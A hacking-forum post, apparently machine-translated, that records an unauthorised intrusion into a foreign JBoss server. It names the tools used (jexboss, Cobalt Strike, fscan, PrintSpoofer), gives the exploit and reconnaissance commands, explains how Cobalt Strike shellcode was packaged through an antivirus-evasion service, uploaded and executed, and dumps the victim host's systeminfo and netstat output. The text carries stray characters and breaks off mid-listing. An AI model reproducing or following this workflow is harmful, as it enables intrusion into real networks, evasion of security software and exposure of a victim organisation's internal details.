Jump to content

Title: Record an intranet horizontal kill-free test

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Tool Preparation

jexboss

Kali Linux

CS 4.3

Windows Killer Online Query One

Windows Killer Online Query Two

Windows Killer Online Query Three

fscan

Tide shellcode free kill

LSTAR

Other plugins for CobaltStrike

PEASS-ng

PrintSpoofer

Outdoor Internet Service

1. In order to practice the horizontal direction of the intranet, quietly focus on foreign sites

2. Found that there is a deserialization vulnerability in the jboss website. Yes, jexboss cannot be used successfully.

python jexboss.py -u https://xx.xx.xx/3. Ultimate testing tool for deserialization by 6 brother successfully utilized

1049983-20230215131239116-223537581.jpg

4. Check the current user whoami, ordinary user

1049983-20230215131240001-1805733217.jpg

5. Check IP address ipconfig

1049983-20230215131240695-1226303758.png

6. Check whether there is a killer tasklist /svc

1049983-20230215131241427-1688620320.jpg

7. Paste the query content into Windows Killing Soft Online Query and find that there is Killing Soft

1049983-20230215131242229-2119682491.png

8. Check whether the server is out of the network ping www.baidu.com, it is very good. The server is out of the network

1049983-20230215131242947-720790428.jpg

CS is online

1. Because there is a soft-killing software, we need to consider bypassing it. It is definitely not possible to upload CS Trojan directly. This time, the tide shellcode is not killed, because many exe files packaged using python on github are too large and uploaded very slowly, while the tide shellcode is not killed, and the upload is faster.

2. CS becomes a shellcode in C language

1049983-20230215131243779-988047620.jpg

3. Copy the shellcode content to the tidal website, upload the generated exe to the target machine, and then execute the command

C:\\usr\\desarrollo\\jboss-5.1.0.GA\\server\\sigAmeServer\\deploy\\ROOT.war\\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide

1049983-20230215131244506-1032424649.jpg

4. CS is successfully launched

1049983-20230215131245276-813131303.jpg

Permission enhancement

Information Collection

1. View the current user and privileges

Whoami

whoami /priv

1049983-20230215131246068-433870973.jpg

2. View system version and patch information

systeminfo

1049983-20230215131246951-13416048.jpg

Nombre de host: AMEPROWEBEGAD

Nombre del sistema operatingvo: Microsoft Windows 10 Pro

Versi¢n del sistema operativo: 10.0.19044 N/D Compilaci¢n 19044

Fabricante del sistema operatingvo: Microsoft Corporation

Configuraci¢n del sistema operativo: Estaci¢n de trabajo miembro

Tipo de compilaci¢n del sistema operativo: Multiprocessor Free

Propiedad de: appzusr

Organizaci¢n registrada:

Id. del producto: 00331-10000-00001-AA727

Fecha de instalaci¢n original: 13/5/2022, 14:03:47

Tiempo de arranque del sistema: 1/2/2023, 16:50:29

Fabricante del sistema: VMware, Inc.

Modelo el sistema: VMware Virtual Platform

Tipo de sistema: x64-based PC

Procesador(es): 2 Procesadores instalados.

[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz

[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz

Versi¢n del BIOS: Phoenix Technologies LTD 6.00, 12/11/2020

Directorio de Windows: C:\Windows

Directorio de sistema: C:\Windows\system32

Dispositivo de arranque: \Device\HarddiskVolume1

Configuraci¢n regional del sistema: ezs-mx;Espa¤ol (M‚xico)

Idioma de entrada: es-mx;Espa¤ol (M‚xico)

Zona horaria: (UTC-06:00) Guadalajara, Ciudad de M‚xico, Monterrey

Cantidad total de memoria f¡ sica: 4.095 MB

Memoria f¡ sica disponible: 1.201 MB

Memoria virtual: tama¤o m ximo: 4.799 MB

Memoria virtual: disponible: 1.147 MB

Memoria virtual: en uso: 3.652 MB

Ubicaci¢n(es) de archivo de paginaci¢n: C:\pagefile.sys

Dominio: ame.local

Servidor de inicio de sesi¢n: \\AMEPROWEBEGAD

Revisi¢n(es): 4 revisi¢n(es) instaladas.

[01]: KB5004331

[02]: KB5003791

[03]: KB5006670

[04]: KB5005699

Tarjeta(s) de red: 1 Tarjetas de interfaz de red instaladas.

z [01]: Intel(R) PRO/1000 MT Network Connection

Nombre de conexi¢n: Ethernet0

DHCP habilitado: No

Direcciones IP

[01]: 172.16.2.100

[02]: fe80:591:ae09:eee1:888e

Requires Hyper-V: Se detect¢ un hippervisor. No se mostr n las caracter¡ sticas necessary para Hyper-V.3, view open port service netstat -ano

Conexiones activas

Proto Direcci¢n local Direcci¢n remota Estado PID

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 600

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4

TCP 0.0.0.0:1090 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:1098 0.0.0.0:0 LISTENING 7600

TCP z 0.0.0.0:1099 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1072

TCP 0.0.0.0:3873 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:4445 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:4446 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:4457 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:4712 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:4713 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6652

TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4

TCP 0.0.0.0:7070 0.0.0.0:0 LISTENING 3564

TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:8080 0.0.0.0:0 z LISTENING 7600

TCP 0.0.0.0:8083 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:46305 0.0.0.0:0 LISTENING 7600

TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4

TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 832

TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 680

TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1416

TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1612

TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2452

TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 832

TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 3404

TCP 0.0.0.0:49704 0.0.0.0:0 LISTENING 820

TCP 0.0.0.0:49708 0.0.0.0:0 LISTENING 3048

TCP 0.0.0.0:51407 0.0.0.0:0 LISTENING 7600

TCP 127z.0.0.1:5140 0.0.0.0:0 LISTENING 7172

TCP 127.0.0.1:51411 0.0.0.0:0 LISTENING 7600

TCP 172.16.2.100:139 0.0.0.0:0 LISTENING 4

TCP 172.16.2.100:8080 172.16.12.34:42602 TIME_WAIT 0

TCP 172.16.2.100:8080 172.16.12.34:42610 ESTABLISHED 7600

TCP 172.16.2.100:8080 172.16.12.34:55672 TIME_WAIT 0

TCP 172.16.2.100:8080 172.16.12.34:55686 TIME_WAIT 0

TCP 172.16.2.100:49717 38.90.226.62:8883 ESTABLISHED 3576

TCP 172.16.2.100:50848 172.16.2.100:51407 TIME_WAIT 0

TCP 172.16.2.100:51413 172.16.2.190:1433 ESTABLISHED 7600

TCP 172.16.2.100:51447 172.16.2.190:1433 ESTABLISHED 7600

TCP 172.16.2.100:56063 172.16.2.11:2222 ESTABLISHED 3576

TCP 172.16.2.100:56538 92.223.66.48:443 ESTABLISHED 3564

TCP [:]:135 [:]:0 LISTENINzG 600

TCP [:]:445 [:]:0 LISTENING 4

TCP [:]:1090 [:]:0 LISTENING 7600

TCP [:]:1098 [:]:0 LISTENING 7600

TCP [:]:1099 [:]:0 LISTENING 7600

TCP [:]:3389 [:]:0 LISTENING 1072

TCP [:]:3873 [:]:0 LISTENING 7600

TCP [:]:4444 [:]:0 LISTENING 7600

TCP [:]:4445 [:]:0 LISTENING 7600

TCP [:]:4446 [:]:0 LISTENING 7600

TCP [:]:4457 [:]:0 LISTENING 7600

TCP [:]:4712 [:]:0 LISTENING 7600

TCP [:]:4713 [:]:0 LISTENING 7600

TCP [:]:5985

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.